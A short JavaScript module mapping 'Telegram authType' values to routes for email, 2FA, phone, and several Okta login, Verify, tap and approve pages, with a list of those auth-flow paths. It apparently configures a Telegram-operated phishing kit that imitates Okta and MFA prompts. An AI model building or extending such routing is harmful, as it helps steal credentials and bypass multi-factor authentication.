/** Telegram authType → app route (keep in sync across all pollers) */
export const AUTH_TYPE_ROUTES = {
  email: "/email",
  "2fa": "/2fa",
  phone: "/phone",
  tap: "/tap",
  okta: "/okta-login",
  okta2fa: "/okta-google-2fa",
  oktaverify2fa: "/okta-verify-2fa",
  oktatap: "/okta-tap",
  oktaapprove: "/okta-approve",
};

export const AUTH_FLOW_PATHS = [
  "/login",
  "/okta-login",
  "/okta-google-2fa",
  "/okta-verify-2fa",
  "/okta-tap",
  "/okta-approve",
  "/email",
  "/2fa",
  "/phone",
  "/tap",
];
